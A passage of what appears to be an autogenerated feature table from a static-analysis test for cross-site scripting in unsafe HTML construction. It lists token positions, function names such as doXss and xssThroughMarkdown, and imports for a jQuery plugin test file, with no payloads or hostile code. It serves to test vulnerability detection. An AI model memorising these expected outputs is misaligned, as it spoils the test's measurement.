});\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:64:1 | $.fn.xs ... });\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:64:1 | $.fn.xs ... });\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:3:56:4 | fn | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:3:56:4 | fn | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:3:56:4 | fn | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:6:56:14 | xssPlugin | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:6:56:14 | xssPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:6:56:14 | xssPlugin | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:17 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:17 | this | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:17 | this | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:17 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:18 | settings | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:18 | settings | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:18 | settings | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:18 | settings | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:56:18 | settings | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | 'arguments' object of anonymous function | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | 'arguments' object of anonymous function | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | exceptional return of anonymous function | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | exceptional return of anonymous function | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | functio ... });\\n} | assignedToPropName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | functio ... });\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | functio ... });\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | return of anonymous function | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | return of anonymous function | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:18:64:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:28:56:34 | options | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:57:18 | defaults | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:57:18 | defaults | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:57:18 | defaults | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:57:18 | defaults | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:57:18 | defaults | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | default ... "\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | default ... "\\n } | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | default ... "\\n } | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | default ... "\\n } | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | default ... "\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | defaults | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | defaults | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | defaults | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | defaults | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:11:59:5 | defaults | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:22:59:5 | {\\n ... "\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:22:59:5 | {\\n ... "\\n } | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:22:59:5 | {\\n ... "\\n } | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:22:59:5 | {\\n ... "\\n } | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:57:22:59:5 | {\\n ... "\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:12 | name | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:12 | name | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:12 | name | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:12 | name | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:12 | name | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:9:58:20 | name: "name" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:15:58:20 | "name" | assignedToPropName | name | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:15:58:20 | "name" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:15:58:20 | "name" | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:15:58:20 | "name" | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:15:58:20 | "name" | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:58:15:58:20 | "name" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:18 | settings | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | setting ... ptions) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | setting ... ptions) | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | setting ... ptions) | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | setting ... ptions) | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | setting ... ptions) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | settings | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | settings | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | settings | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | settings | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:11:60:48 | settings | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:22 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:22 | $ | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:22 | $ | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:22 | $ | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:22 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:29 | $.extend | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:29 | $.extend | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:29 | $.extend | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:29 | $.extend | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:29 | $.extend | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | $.exten ... ptions) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | $.exten ... ptions) | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | $.exten ... ptions) | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | $.exten ... ptions) | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | $.exten ... ptions) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | exceptional return of $.exten ... ptions) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | exceptional return of $.exten ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | exceptional return of $.exten ... ptions) | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | exceptional return of $.exten ... ptions) | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:22:60:48 | exceptional return of $.exten ... ptions) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:24:60:29 | extend | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:24:60:29 | extend | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:24:60:29 | extend | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:24:60:29 | extend | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:24:60:29 | extend | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:31:60:38 | defaults | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:31:60:38 | defaults | InputArgumentIndex | 0 | 